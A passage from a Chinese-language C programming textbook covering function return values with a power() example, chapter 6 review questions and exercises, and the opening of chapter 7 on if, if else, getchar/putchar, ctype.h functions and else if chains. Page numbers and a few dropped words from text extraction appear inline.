项。第1次循环后,pow的值是1乘以n,即n;第2次循环后,pow的值是上一 次的值(n)乘以n,即n的平方;以此类推。这种情况使用for循环很合适, 因为在执行循环之前已预先知道了迭代的次数(已知p)。 现在算法已确定,接下来要决定使用何种数据类型。指数p是整数,其 类型应该是int。为了扩大n及其幂的范围,n和pow的类型都是double。 接下来,考虑如何把以上内容用函数来实现。要使用两个参数(分别是 double类型和int类型)才能把所需的信息传递给函数,并指定求哪个数的多 少次幂。而且,函数要返回一个值。如何把函数的返回值返回给主调函数? 编写一个有返回值的函数,要完成以下内容: 1.定义函数时,确定函数的返回类型; 2.使用关键字return表明待返回的值。 例如,可以这样写: 383 double power(double n, int p) // 返回一个double类型的值 { double pow = 1; int i; for (i = 1; i <= p; i++) pow *= n; return pow; // 返回pow的值 } 要声明函数的返回类型,在函数名前写出类型即可,就像声明一个变量 那样。关键字 return 表明该函数将把它后面的值返回给主调函数。根据上面 的代码,函数返回一个变量的值。返回值也可以是表达式的值,如下所示: return 2 * x + b; 函数将计算表达式的值,并返回该值。在主调函数中,可以把返回值赋 给另一个变量、作为表达式中的值、作为另一个函数的参数(如, ),或者忽略它。 现在,我们在一个程序中使用这个函数。要测试一个函数很简单,只需 给它提供几个值,看它是如何响应的。这种情况下可以创建一个输入循环, 选择 while 循环很合适。可以使用 scanf()函数一次读取两个值。如果成功读 取两个值,scanf()则返回2,所以可以把scanf()的返回值与2作比较来控制循 环。还要注意,必须先声明power()函数(即写出函数原型)才能在程序中 使用它,就像先声明变量再使用一样。程序清单6.20演示了这个程序。 程序清单6.20 powwer.c程序 384 // power.c -- 计算数的整数幂 #include <stdio.h> double power(double n, int p); // ANSI函数原型 int main(void) { double x, xpow; int exp; printf("Enter a number and the positive integer power"); printf(" to which\nthe number will be raised. Enter q"); printf(" to quit.\n"); while (scanf("%lf%d", &x, &exp) == 2) { xpow = power(x, exp); // 函数调用 printf("%.3g to the power %d is %.5g\n", x, exp, xpow); printf("Enter next pair of numbers or q to quit.\n"); } printf("Hope you enjoyed this power trip -- bye!\n"); return 0; } 385 double power(double n, int p)  // 函数定义 { double pow = 1; int i; for (i = 1; i <= p; i++) pow *= n; return pow;          // 返回pow的值 } 运行该程序后,输出示例如下: Enter a number and the positive integer power to which the number will be raised. Enter q to quit. 1.2 12 1.2 to the power 12 is 8.9161 Enter next pair of numbers or q to quit. 2 16 2 to the power 16 is 65536 Enter next pair of numbers or q to quit. q 386 Hope you enjoyed this power trip -- bye! 6.12.1 程序分析 该程序示例中的main()是一个驱动程序(driver),即被设计用来测试 函数的小程序。 该例的while循环是前面讨论过的一般形式。输入1.2 12,scanf()成功读 取两值,并返回2,循环继续。因为scanf()跳过空白,所以可以像输出示例 那样,分多行输入。但是输入q会使scanf()的返回值为0,因为q与scanf()中的 转换说明%1f不匹配。scanf()将返回0,循环结束。类似地,输入2.8 q会使 scanf()的返回值为1,循环也会结束。 现在分析一下与函数相关的内容。powwer()函数在程序中出现了3次。 首次出现是: double power(double n, int p); // ANSI函数原型 这是power()函数的原型,它声明程序将使用一个名为power()的函数。 开头的关键字double表明power()函数返回一个double类型的值。编译器要知 道power()函数返回值的类型,才能知道有多少字节的数据,以及如何解释 它们。这就是为什么必须声明函数的原因。圆括号中的 double n, int p表示 power()函数的两个参数。第1个参数应该是double类型的值,第2个参数应该 是int类型的值。 第2次出现是: xpow = power(x,exp); // 函数调用 程序调用power(),把两个值传递给它。该函数计算x的exp次幂,并把 计算结果返回给主调函数。在主调函数中,返回值将被赋给变量xpow。 第3次出现是: 387 double power(double n, int p) // 函数定义 这里,power()有两个形参,一个是double类型,一个是int类型,分别由 变量n和变量p表示。注意,函数定义的末尾没有分号,而函数原型的末尾有 分号。在函数头后面花括号中的内容,就是power()完成任务的代码。 power()函数用for循环计算n的p次幂,并把计算结果赋给pow,然后返 回pow的值,如下所示: return pow; //返回pow的值 6.12.2 使用带返回值的函数 声明函数、调用函数、定义函数、使用关键字return,都是定义和使用 带返回值函数的基本要素。 这里,读者可能有一些问题。例如,既然在使用函数返回值之前要声明 函数,那么为什么在使用scanf()的返回值之前没有声明scanf()?为什么在定 义中说明了power()的返回类型为double,还要单独声明这个函数? 我们先回答第2 个问题。编译器在程序中首次遇到power()时,需要知道 power()的返回类型。此时,编译器尚未执行到power()的定义,并不知道函 数定义中的返回类型是double。因此,必须通过前置声明(forward declaration)预先说明函数的返回类型。前置声明告诉编译器,power()定义 在别处,其返回类型为double。如果把power()函数的定义置于main()的文件 顶部,就可以省略前置声明,因为编译器在执行到main()之前已经知道 power()的所有信息。但是,这不是C的标准风格。因为main()通常只提供整 个程序的框架,最好把 main()放在所有函数定义的前面。另外,通常把函数 放在其他文件中,所以前置声明必不可少。 接下来,为什么不用声明 scanf()函数就可以使用它?其实,你已经声明 了。stdio.h 头文件中包含了scanf()、printf()和其他I/O函数的原型。scanf()函 数的原型表明,它返回的类型是int。 388 6.13 关键概念 循环是一个强大的编程工具。在创建循环时,要特别注意以下3个方 面: 注意循环的测试条件要能使循环结束; 确保循环测试中的值在首次使用之前已初始化; 确保循环在每次迭代都更新测试的值。 C通过求值来处理测试条件,结果为0表示假,非0表示真。带关系运算 符的表达式常用于循环测试,它们有些特殊。如果关系表达式为真,其值为 1;如果为假,其值为0。这与新类型_Bool的值保持一致。 数组由相邻的内存位置组成,只储存相同类型的数据。记住,数组元素 的编号从 0 开始,所有数组最后一个元素的下标一定比元素数目少1。C编 译器不会检查数组下标值是否有效,自己要多留心。 使用函数涉及3个步骤: 通过函数原型声明函数; 在程序中通过函数调用使用函数; 定义函数。 函数原型是为了方便编译器查看程序中使用的函数是否正确,函数定义 描述了函数如何工作。现代的编程习惯是把程序要素分为接口部分和实现部 分,例如函数原型和函数定义。接口部分描述了如何使用一个特性,也就是 函数原型所做的;实现部分描述了具体的行为,这正是函数定义所做的。 389 6.14 本章小结 本章的主题是程序控制。C语言为实现结构化的程序提供了许多工具。 while语句和for语句提供了入口条件循环。for语句特别适用于需要初始化和 更新的循环。使用逗号运算符可以在for循环中初始化和更新多个变量。有 些场合也需要使用出口条件循环,C为此提供了do while语句。 典型的while循环设计的伪代码如下: 获得初值 while (值满足测试条件) { 处理该值 获取下一个值 } for循环也可以完成相同的任务: for (获得初值; 值满足测试条件; 获得下一个值) 处理该值 这些循环都使用测试条件来判断是否继续执行下一次迭代。一般而言, 如果对测试表达式求值为非0,则继续执行循环;否则,结束循环。通常, 测试条件都是关系表达式(由关系运算符和表达式构成)。表达式的关系为 真,则表达式的值为1;如果关系为假,则表达式的值为0。C99新增了 _Bool类型,该类型的变量只能储存1或0,分别表示真或假。 除了关系运算符,本章还介绍了其他的组合赋值运算符,如+=或*=。 这些运算符通过对其左侧运算对象执行算术运算来修改它的值。 390 接下来还简单地介绍了数组。声明数组时,方括号中的值指明了该数组 的元素个数。数组的第 1 个元素编号为0,第2个元素编号为1,以此类推。 例如,以下声明: double hippos[20]; 创建了一个有20个元素的数组hippos,其元素从hippos[0]~hippos[19]。 利用循环可以很方便地操控数组的下标。 最后,本章演示了如何编写和使用带返回值的函数。 391 6.15 复习题 复习题的参考答案在附录A中。 1.写出执行完下列各行后quack的值是多少。后5行中使用的是第1行 quack的值。 int quack = 2; quack += 5; quack *= 10; quack -= 6; quack /= 8; quack %= 3; 2.假设value是int类型,下面循环的输出是什么? for ( value = 36; value > 0; value /= 2) printf("%3d", value); 如果value是double类型,会出现什么问题? 3.用代码表示以下测试条件: a.大于5 b. 读取一个名为 的 类型值且失败 c.X的值等于 4.用代码表示以下测试条件: 392 a. 成功读入一个整数 b. 不等于 c. 大于或等于 5.下面的程序有点问题,请找出问题所在。 #include <stdio.h> int main(void) {                  /* 第3行 */ int i, j, list(10);       /* 第4行 */ for (i = 1, i <= 10, i++)    /* 第6行 */ {                /* 第7行 */ list[i] = 2*i + 3;      /* 第8行 */ for (j = 1, j > = i, j++)  /* 第9行 */ printf(" %d", list[j]); /* 第10行 */ printf("\n");        /* 第11行 */ }                  /* 第12行 */ 6.编写一个程序打印下面的图案,要求使用嵌套循环: $$$$$$$$ $$$$$$$$ $$$$$$$$ 393 $$$$$$$$ 7.下面的程序各打印什么内容? a. #include <stdio.h> int main(void) { int i = 0; while (++i < 4) printf("Hi! "); do printf("Bye! "); while (i++ < 8); return 0; } b. #include <stdio.h> int main(void) { int i; 394 char ch; for (i = 0, ch = 'A'; i < 4; i++, ch += 2 * i) printf("%c", ch); return 0; } 8.假设用户输入的是 ,下面各程序的输出是什 么?(在ASCII码中,!紧跟在空格字符后面) a. #include <stdio.h> int main(void) { char ch; scanf("%c", &ch); while (ch != 'g') { printf("%c", ch); scanf("%c", &ch); } return 0; 395 } b. #include <stdio.h> int main(void) { char ch; scanf("%c", &ch); while (ch != 'g') { printf("%c", ++ch); scanf("%c", &ch); } return 0; } c. #include <stdio.h> int main(void) { char ch; 396 do { scanf("%c", &ch); printf("%c", ch); } while (ch != 'g'); return 0; } d. #include <stdio.h> int main(void) { char ch; scanf("%c", &ch); for (ch = '$'; ch != 'g'; scanf("%c", &ch)) printf("%c", ch); return 0; } 9.下面的程序打印什么内容? #include <stdio.h> int main(void) 397 { int n, m; n = 30; while (++n <= 33) printf("%d|", n); n = 30; do printf("%d|", n); while (++n <= 33); printf("\n***\n"); for (n = 1; n*n < 200; n += 4) printf("%d\n", n); printf("\n***\n"); for (n = 2, m = 6; n < m; n *= 2, m += 2) printf("%d %d\n", n, m); printf("\n***\n"); for (n = 5; n > 0; n--) { for (m = 0; m <= n; m++) 398 printf("="); printf("\n"); } return 0; } 10.考虑下面的声明: double mint[10]; a.数组名是什么? b.该数组有多少个元素? c.每个元素可以储存什么类型的值? d.下面的哪一个scanf()的用法正确? i.scanf("%lf", mint[2]) ii.scanf("%lf", &mint[2]) iii.scanf("%lf", &mint) 11.Noah先生喜欢以2计数,所以编写了下面的程序,创建了一个储存 2、4、6、8等数字的数组。 这个程序是否有错误之处?如果有,请指出。 #include <stdio.h> #define SIZE 8 399 int main(void) { int by_twos[SIZE]; int index; for (index = 1; index <= SIZE; index++) by_twos[index] = 2 * index; for (index = 1; index <= SIZE; index++) printf("%d ", by_twos); printf("\n"); return 0; } 12.假设要编写一个返回long类型值的函数,函数定义中应包含什么? 13.定义一个函数,接受一个int类型的参数,并以long类型返回参数的平 方值。 14.下面的程序打印什么内容? #include <stdio.h> int main(void) { int k; 400 for (k = 1, printf("%d: Hi!\n", k); printf("k = %d\n", k), k*k < 26; k += 2, printf("Now k is %d\n", k)) printf("k is %d in the loop\n", k); return 0; } 401 6.16 编程练习 1.编写一个程序,创建一个包含26个元素的数组,并在其中储存26个小 写字母。然后打印数组的所有内容。 2.使用嵌套循环,按下面的格式打印字符: $ $$ $$$ $$$$ $$$$$ 3.使用嵌套循环,按下面的格式打印字母: F FE FED FEDC FEDCB FEDCBA 注意:如果你的系统不使用ASCII或其他以数字顺序编码的代码,可以 把字符数组初始化为字母表中的字母: char lets[27] = "ABCDEFGHIJKLMNOPQRSTUVWXYZ"; 402 然后用数组下标选择单独的字母,例如lets[0]是‘A’,等等。 4.使用嵌套循环,按下面的格式打印字母: A BC DEF GHIJ KLMNO PQRSTU 如果你的系统不使用以数字顺序编码的代码,请参照练习3的方案解 决。 5.编写一个程序,提示用户输入大写字母。使用嵌套循环以下面金字塔 型的格式打印字母: A ABA ABCBA ABCDCBA ABCDEDCBA 打印这样的图形,要根据用户输入的字母来决定。例如,上面的图形是 在用户输入E后的打印结果。 提示:用外层循环处理行,每行使用3个内层循环,分别处理空格、以 403 升序打印字母、以降序打印字母。如果系统不使用ASCII或其他以数字顺序 编码的代码,请参照练习3的解决方案。 6.编写一个程序打印一个表格,每一行打印一个整数、该数的平方、该 数的立方。要求用户输入表格的上下限。使用一个for循环。 7.编写一个程序把一个单词读入一个字符数组中,然后倒序打印这个单 词。提示:strlen()函数(第4章介绍过)可用于计算数组最后一个字符的下 标。 8.编写一个程序,要求用户输入两个浮点数,并打印两数之差除以两数 乘积的结果。在用户输入非数字之前,程序应循环处理用户输入的每对值。 9.修改练习8,使用一个函数返回计算的结果。 10.编写一个程序,要求用户输入一个上限整数和一个下限整数,计算 从上限到下限范围内所有整数的平方和,并显示计算结果。然后程序继续提 示用户输入上限和下限整数,并显示结果,直到用户输入的上限整数小于下 限整数为止。程序的运行示例如下: Enter lower and upper integer limits: 5 9 The sums of the squares from 25 to 81 is 255 Enter next set of limits: 3 25 The sums of the squares from 9 to 625 is 5520 Enter next set of limits: 5 5 Done 11.编写一个程序,在数组中读入8个整数,然后按倒序打印这8个整 数。 404 12.考虑下面两个无限序列: 1.0 + 1.0/2.0 + 1.0/3.0 + 1.0/4.0 + ... 1.0 - 1.0/2.0 + 1.0/3.0 - 1.0/4.0 + ... 编写一个程序计算这两个无限序列的总和,直到到达某次数。提示:奇 数个-1 相乘得-1,偶数个-1相乘得1。让用户交互地输入指定的次数,当用 户输入0或负值时结束输入。查看运行100项、1000项、10000项后的总和, 是否发现每个序列都收敛于某值? 13.编写一个程序,创建一个包含8个元素的int类型数组,分别把数组元 素设置为2的前8次幂。使用for循环设置数组元素的值,使用do while循环显 示数组元素的值。 14.编写一个程序,创建两个包含8个元素的double类型数组,使用循环 提示用户为第一个数组输入8 个值。第二个数组元素的值设置为第一个数组 对应元素的累积之和。例如,第二个数组的第 4个元素的值是第一个数组前 4个元素之和,第二个数组的第5个元素的值是第一个数组前5个元素之和 (用嵌套循环可以完成,但是利用第二个数组的第5个元素是第二个数组的 第4个元素与第一个数组的第5个元素之和,只用一个循环就能完成任务,不 需要使用嵌套循环)。最后,使用循环显示两个数组的内容,第一个数组显 示成一行,第二个数组显示在第一个数组的下一行,而且每个元素都与第一 个数组各元素相对应。 15.编写一个程序,读取一行输入,然后把输入的内容倒序打印出来。 可以把输入储存在char类型的数组中,假设每行字符不超过255。回忆一 下,根据%c转换说明,scanf()函数一次只能从输入中读取一个字符,而且 在用户按下Enter键时scanf()函数会生成一个换行字符(\n)。 16.Daphne以10%的单利息投资了100美元(也就是说,每年投资获利相 当于原始投资的10%)。Deirdre以 5%的复合利息投资了 100 美元(也就是 说,利息是当前余额的 5%,包含之前的利息)。编写一个程序,计算需要 405 多少年Deirdre的投资额才会超过Daphne,并显示那时两人的投资额。 17.Chuckie Lucky赢得了100万美元(税后),他把奖金存入年利率8%的 账户。在每年的最后一天, Chuckie取出10万美元。编写一个程序,计算多 少年后Chuckie会取完账户的钱? 18.Rabnud博士加入了一个社交圈。起初他有5个朋友。他注意到他的朋 友数量以下面的方式增长。第1周少了1个朋友,剩下的朋友数量翻倍;第2 周少了2个朋友,剩下的朋友数量翻倍。一般而言,第N周少了N个朋友,剩 下的朋友数量翻倍。编写一个程序,计算并显示Rabnud博士每周的朋友数 量。该程序一直运行,直到超过邓巴数(Dunbar’s number)。邓巴数是粗略 估算一个人在社交圈中有稳定关系的成员的最大值,该值大约是150。 [1].其实num的最终值不是6,而是7。虽然最后一次循环打印的num值是6, 但随后num++使num的值为7,然后num<= 6为假,for循环结束。——译者注 406 第7章 C控制语句:分支和跳转 本章介绍以下内容: 关键字:if、else、switch、continue、break、case、default、goto 运算符:&&、||、?: 函数:getchar()、putchar()、ctype.h系列 如何使用if和if else语句,如何嵌套它们 在更复杂的测试表达式中用逻辑运算符组合关系表达式 C的条件运算符 switch语句 break、continue和goto语句 使用C的字符I/O函数:getchar()和putchar() ctype.h头文件提供的字符分析函数系列 随着越来越熟悉C,可以尝试用C程序解决一些更复杂的问题。这时 候,需要一些方法来控制和组织程序,为此C提供了一些工具。前面已经学 过如何在程序中用循环重复执行任务。本章将介绍分支结构(如, if和 switch),让程序根据测试条件执行相应的行为。另外,还将介绍C语言的 逻辑运算符,使用逻辑运算符能在 while 或 if 的条件中测试更多关系。此 外,本章还将介绍跳转语句,它将程序流转换到程序的其他部分。学完本章 后,读者就可以设计按自己期望方式运行的程序。 407 7.1 if语句 我们从一个有if语句的简单示例开始学习,请看程序清单7.1。该程序读 取一列数据,每个数据都表示每日的最低温度(℃),然后打印统计的总天 数和最低温度在0℃以下的天数占总天数的百分比。程序中的循环通过 scanf()读入温度值。while循环每迭代一次,就递增计数器增加天数,其中的 if语句负责判断0℃以下的温度并单独统计相应的天数。 程序清单7.1 colddays.c程序 // colddays.c -- 找出0℃以下的天数占总天数的百分比 #include <stdio.h> int main(void) { const int FREEZING = 0; float temperature; int cold_days = 0; int all_days = 0; printf("Enter the list of daily low temperatures.\n"); printf("Use Celsius, and enter q to quit.\n"); while (scanf("%f", &temperature) == 1) { all_days++; 408 if (temperature < FREEZING) cold_days++; } if (all_days != 0) printf("%d days total: %.1f%% were below freezing.\n", all_days, 100.0 * (float) cold_days / all_days); if (all_days == 0) printf("No data entered!\n"); return 0; } 下面是该程序的输出示例: Enter the list of daily low temperatures. Use Celsius, and enter q to quit. 12 5 -2.5 0 6 8 -3 -10 5 10 q 10 days total: 30.0% were below freezing. while循环的测试条件利用scanf()的返回值来结束循环,因为scanf()在读 到非数字字符时会返回0。temperature的类型是float而不是int,这样程序既可 以接受-2.5这样的值,也可以接受8这样的值。 while循环中的新语句如下: if (temperature < FREEZING) 409 cold_days++; if 语句指示计算机,如果刚读取的值(remperature)小于 0,就把 cold_days 递增 1;如果temperature不小于0,就跳过cold_days++;语句,while 循环继续读取下一个温度值。 接着,该程序又使用了两次if语句控制程序的输出。如果有数据,就打 印结果;如果没有数据,就打印一条消息(稍后将介绍一种更好的方法来处 理这种情况)。 为避免整数除法,该程序示例把计算后的百分比强制转换为 float类 型。其实,也不必使用强制类型转换,因为在表达式100.0 * cold_days / all_days中,将首先对表达式100.0 * cold_days求值,由于C的自动转换类型 规则,乘积会被强制转换成浮点数。但是,使用强制类型转换可以明确表达 转换类型的意图,保护程序免受不同版本编译器的影响。if语句被称为分支 语句(branching statement)或选择语句(selection statement),因为它相当 于一个交叉点,程序要在两条分支中选择一条执行。if语句的通用形式如 下: if ( expression ) statement 如果对expression求值为真(非0),则执行statement;否则,跳过 statement。与while循环一样,statement可以是一条简单语句或复合语句。if 语句的结构和while语句很相似,它们的主要区别是:如果满足条件可执行 的话,if语句只能测试和执行一次,而while语句可以测试和执行多次。 通常,expression 是关系表达式,即比较两个量的大小(如,表达式 x > y 或 c == 6)。如果expression为真(即x大于y,或c == 6),则执行 statement。否则,忽略statement。概括地说,可以使用任意表达式,表达式 的值为0则为假。 410 statement部分可以是一条简单语句,如本例所示,或者是一条用花括号 括起来的复合语句(或块): if (score > big) printf("Jackpot!\n"); // 简单语句 if (joe > ron) {              // 复合语句 joecash++; printf("You lose, Ron.\n"); } 注意,即使if语句由复合语句构成,整个if语句仍被视为一条语句。 411 7.2 if else语句 简单形式的if语句可以让程序选择执行一条语句,或者跳过这条语句。 C还提供了if else形式,可以在两条语句之间作选择。我们用if else形式修正 程序清单7.1中的程序段。 if (all_days != 0) printf("%d days total: %.1f%% were below freezing.\n", all_days, 100.0 * (float) cold_days / all_days); if (all_days == 0) printf("No data entered!\n"); 如果程序发现all_days不等于0,那么它应该知道另一种情况一定是 all_days等于0。用if else形式只需测试一次。重写上面的程序段如下: if (all_days!= 0) printf("%d days total: %.1f%% were below freezing.\n", all_days, 100.0 * (float) cold_days / all_days); else printf("No data entered!\n"); 如果if语句的测试表达式为真,就打印温度数据;如果为假,就打印警 告消息。 注意,if else语句的通用形式是: if ( expression ) 412 statement1 else statement2 如果expression为真(非0),则执行statement1;如果expression为假或 0,则执行else后面的statement2。statement1和statement2可以是一条简单语句 或复合语句。C并不要求一定要缩进,但这是标准风格。缩进让根据测试条 件的求值结果来判断执行哪部分语句一目了然。 如果要在if和else之间执行多条语句,必须用花括号把这些语句括起来 成为一个块。下面的代码结构违反了C语法,因为在if和else之间只允许有一 条语句(简单语句或复合语句): if (x > 0) printf("Incrementing x:\n"); x++; else   // 将产生一个错误 printf("x <= 0 \n"); 编译器把printf()语句视为if语句的一部分,而把x++;看作一条单独的语 句,它不是if语句的一部分。然后,编译器发现else并没有所属的if,这是错 误的。上面的代码应该这样写: if (x > 0) { printf("Incrementing x:\n"); x++; 413 } else printf("x <= 0 \n"); if语句用于选择是否执行一个行为,而else if语句用于在两个行为之间 选择。图7.1比较了这两种语句。 414 图7.1 if语句和if else语句 7.2.1 另一个示例:介绍getchar()和putchar() 到目前为止,学过的大多数程序示例都要求输入数值。接下来,我们看 看输入字符的示例。相信读者已经熟悉了如何用 scanf()和 printf()根据%c 转 换说明读写字符,我们马上要讲解的示例中要用到一对字符输入/输出函 数:getchar()和putchar()。 getchar()函数不带任何参数,它从输入队列中返回下一个字符。例如, 下面的语句读取下一个字符输入,并把该字符的值赋给变量ch: ch = getchar(); 该语句与下面的语句效果相同: scanf("%c", &ch); putchar()函数打印它的参数。例如,下面的语句把之前赋给ch的值作为 字符打印出来: putchar(ch); 该语句与下面的语句效果相同: printf("%c", ch); 由于这些函数只处理字符,所以它们比更通用的scanf()和printf()函数更 快、更简洁。而且,注意 getchar()和 putchar()不需要转换说明,因为它们只 处理字符。这两个函数通常定义在 stdio.h头文件中(而且,它们通常是预处 理宏,而不是真正的函数,第16章会讨论类似函数的宏)。 接下来,我们编写一个程序来说明这两个函数是如何工作的。该程序把 一行输入重新打印出来,但是每个非空格都被替换成原字符在ASCII序列中 的下一个字符,空格不变。这一过程可描述为“如果字符是空白,原样打 415 印;否则,打印原字符在ASCII序列中的下一个字符”。 C代码看上去和上面的描述很相似,请看程序清单7.2。 程序清单7.2 cypher1.c程序 // cypher1.c -- 更改输入,空格不变 #include <stdio.h> #define SPACE ' '        // SPACE表示单引号-空格-单引号 int main(void) { char ch; ch = getchar();       // 读取一个字符 while (ch != '\n')     // 当一行未结束时 { if (ch == SPACE)    // 留下空格 putchar(ch);    // 该字符不变 else putchar(ch + 1);  // 改变其他字符 ch = getchar();    // 获取下一个字符 } putchar(ch);        // 打印换行符 416 return 0; } (如果编译器警告因转换可能导致数据丢失,不用担心。第8章在讲到 EOF时再解释。) 下面是该程序的输入示例: CALL ME HAL. DBMM NF IBM/ 把程序清单7.1中的循环和该例中的循环作比较。前者使用scanf()返回的 状态值判断是否结束循环,而后者使用输入项的值来判断是否结束循环。这 使得两程序所用的循环结构略有不同:程序清单7.1中在循环前面有一条“读 取语句”,程序清单7.2中在每次迭代的末尾有一条“读取语句”。不过,C的 语法比较灵活,读者也可以模仿程序清单7.1,把读取和测试合并成一个表 达式。也就是说,可以把这种形式的循环: ch = getchar();    /* 读取一个字符 */ while (ch != '\n')  /* 当一行未结束时 */ { ...       /* 处理字符 */ ch = getchar();  /* 获取下一个字符 */ } 替换成下面形式的循环: while ((ch = getchar()) != '\n') 417 { ...       /* 处理字符 */ } 关键的一行代码是: while ((ch = getchar()) != '\n') 这体现了C特有的编程风格——把两个行为合并成一个表达式。C对代 码的格式要求宽松,这样写让其中的每个行为更加清晰: while ( (ch = getchar())       // 给ch赋一个值 != '\n')  // 把ch和\n作比较 以上执行的行为是赋值给ch和把ch的值与换行符作比较。表达式ch = getchar()两侧的圆括号使之成为!=运算符的左侧运算对象。要对该表达式求 值,必须先调用getchar()函数,然后把该函数的返回值赋给 ch。因为赋值表 达式的值是赋值运算符左侧运算对象的值,所以 ch = getchar()的值就是 ch 的新值,因此,读取ch的值后,测试条件相当于是ch != '\n'(即,ch不是换 行符)。 这种独特的写法在C编程中很常见,应该多熟悉它。还要记住合理使用 圆括号组合子表达式。上面例子中的圆括号都必不可少。假设省略ch = getchar()两侧的圆括号: while (ch = getchar() != '\n') !=运算符的优先级比=高,所以先对表达式getchar() != '\n'求值。由于这 是关系表达式,所以其值不是1就是0(真或假)。然后,把该值赋给ch。省 略圆括号意味着赋给ch的值是0或1,而不是 getchar()的返回值。这不是我们 418 的初衷。 下面的语句: putchar(ch + 1); /* 改变其他字符 */ 再次演示了字符实际上是作为整数储存的。为方便计算,表达式ch + 1 中的ch被转换成int类型,然后int类型的计算结果被传递给接受一个int类型参 数的putchar(),该函数只根据最后一个字节确定显示哪个字符。 7.2.2 ctype.h系列的字符函数 注意到程序清单7.2的输出中,最后输入的点号(.)被转换成斜杠 (/),这是因为斜杠字符对应的ASCII码比点号的 ASCII 码多 1。如果程序 只转换字母,保留所有的非字母字符(不只是空格)会更好。本章稍后讨论 的逻辑运算符可用来测试字符是否不是空格、不是逗号等,但是列出所有的 可能性太繁琐。C 有一系列专门处理字符的函数,ctype.h头文件包含了这些 函数的原型。这些函数接受一个字符作为参数,如果该字符属于某特殊的类 别,就返回一个非零值(真);否则,返回0(假)。例如,如果isalpha() 函数的参数是一个字母,则返回一个非零值。程序清单7.3在程序清单7.2的 基础上使用了这个函数,还使用了刚才精简后的循环。 程序清单7.3 cypher2.c程序 // cypher2.c -- 替换输入的字母,非字母字符保持不变 #include <stdio.h> #include <ctype.h>       // 包含isalpha()的函数原型 int main(void) { char ch; 419 while ((ch = getchar()) != '\n') { if (isalpha(ch))    // 如果是一个字符, putchar(ch + 1);  // 显示该字符的下一个字符 else          // 否则, putchar(ch);    // 原样显示 } putchar(ch);        // 显示换行符 return 0; } 下面是该程序的一个输出示例,注意大小写字母都被替换了,除了空格 和标点符号: Look! It's a programmer! Mppl! Ju't b qsphsbnnfs! 表7.1和表7.2列出了ctype.h头文件中的一些函数。有些函数涉及本地 化,指的是为适应特定区域的使用习惯修改或扩展 C 基本用法的工具(例 如,许多国家在书写小数点时,用逗号代替点号,于是特殊的本地化可以指 定C编译器使用逗号以相同的方式输出浮点数,这样123.45可以显示为 123,45)。注意,字符映射函数不会修改原始的参数,这些函数只会返回已 修改的值。也就是说,下面的语句不改变ch的值: tolower(ch); // 不影响ch的值 420 这样做才会改变ch的值: ch = tolower(ch); // 把ch转换成小写字母 表7.1 ctype.h头文件中的字符测试函数 表7.2 ctype.h头文件中的字符映射函数 7.2.3 多重选择else if 现实生活中我们经常有多种选择。在程序中也可以用else if扩展if else结 构模拟这种情况。来看一个特殊的例子。电力公司通常根据客户的总用电量 来决定电费。下面是某电力公司的电费清单,单位是千瓦时(kWh): 首 360kWh:     $0.13230/kWh 续 108kWh:     $0.15040/kWh 续 252kWh:     $0.30025/kWh 421 超过 720kWh:    $0.34025/kWh 如果对用电管理感兴趣,可以编写一个计算电费的程序。程序清单7.4 是完成这一任务的第1步。 程序清单7.4 electric.c程序 // electric.c -- 计算电费 #include <stdio.h> #define RATE1  0.13230       // 首次使用 360 kwh 的费率 #define RATE2  0.15040       // 接着再使用 108 kwh 的费率 #define RATE3  0.30025       // 接着再使用 252 kwh 的费率 #define RATE4  0.34025       // 使用超过 720kwh 的费率 #define BREAK1 360.0        // 费率的第1个分界点 #define BREAK2 468.0        // 费率的第2个分界点 #define BREAK3 720.0        // 费率的第3个分界点 #define BASE1 (RATE1 * BREAK1) // 使用360kwh的费用 #define BASE2 (BASE1 + (RATE2 * (BREAK2 - BREAK1))) // 使用468kwh的费用 #define BASE3 (BASE1 + BASE2 + (RATE3 *(BREAK3 - BREAK2))) // 使用720kwh的费用 422 int main(void) { double kwh;           // 使用的千瓦时 double bill;          // 电费 printf("Please enter the kwh used.\n"); scanf("%lf", &kwh);       // %lf对应double类型 if (kwh <= BREAK1) bill = RATE1 * kwh; else if (kwh <= BREAK2)     // 360~468 kwh bill = BASE1 + (RATE2 * (kwh - BREAK1)); else if (kwh <= BREAK3)     // 468~720 kwh bill = BASE2 + (RATE3 * (kwh - BREAK2)); else              // 超过 720 kwh bill = BASE3 + (RATE4 * (kwh - BREAK3)); printf("The charge for %.1f kwh is $%1.2f.\n", kwh, bill); return 0; } 该程序的输出示例如下: Please enter the kwh used. 423 580 The charge for 580.0 kwh is $97.50. 程序清单 7.4 用符号常量表示不同的费率和费率分界点,以便把常量统 一放在一处。这样,电力公司在更改费率以及费率分界点时,更新数据非常 方便。BASE1和BASE2根据费率和费率分界点来表示。一旦费率或分界点发 生了变化,它们也会自动更新。预处理器是不进行计算的。程序中出现 BASE1的地方都会被替换成 0.13230*360.0。不用担心,编译器会对该表达 式求值得到一个数值(47.628),以便最终的程序代码使用的是47.628而不 是一个计算式。 程序流简单明了。该程序根据kwh的值在3个公式之间选择一个。特别 要注意的是,如果kwh大于或等于360,程序只会到达第1个else。因此,else if (kwh <= BREAK2)这行相当于要求kwh在360~482之间,如程序注释所 示。类似地,只有当kwh的值超过720时,才会执行最后的else。最后,注意 BASE1、BASE2和BASE3分别代表360、468和720千瓦时的总费用。因此, 当电量超过这些值时,只需要加上额外的费用即可。 实际上,else if 是已学过的 if else 语句的变式。例如,该程序的核心部 分只不过是下面代码的另一种写法: if (kwh <= BREAK1) bill = RATE1 * kwh; else if (kwh <= BREAK2)     // 360~468 kwh bill = BASE1 + (RATE2 * (kwh - BREAK1)); else if (kwh <= BREAK3)   // 468~720 kwh 424 bill = BASE2 + (RATE3 * (kwh - BREAK2)); else          // 超过720 kwh bill = BASE3 + (RATE4 * (kwh - BREAK3)); 也就是说,该程序由一个ifelse语句组成,else部分包含另一个if else语 句,该if else语句的else部分又包含另一个if else语句。第2个if else语句嵌套 在第 1个if else语句中,第3个if else语句嵌套在第2个if else语句中。回忆一 下,整个if else语句被视为一条语句,因此不必把嵌套的if else语句用花括号 括起来。当然,花括号可以更清楚地表明这种特殊格式的含义。 这两种形式完全等价。唯一不同的是使用空格和换行的位置不同,不过 编译器会忽略这些。尽管如此,第1种形式还是好些,因为这种形式更清楚 地显示了有4种选择。在浏览程序时,这种形式让读者更容易看清楚各项选 择。在需要时要缩进嵌套的部分,例如,必须测试两个单独的量时。本例 中,仅在夏季对用电量超过720kWh的用户加收10%的电费,就属于这种情 况。 可以把多个else if语句连成一串使用,如下所示(当然,要在编译器的 限制范围内): if (score < 1000) bonus = 0; else if (score < 1500) bonus = 1; else if (score < 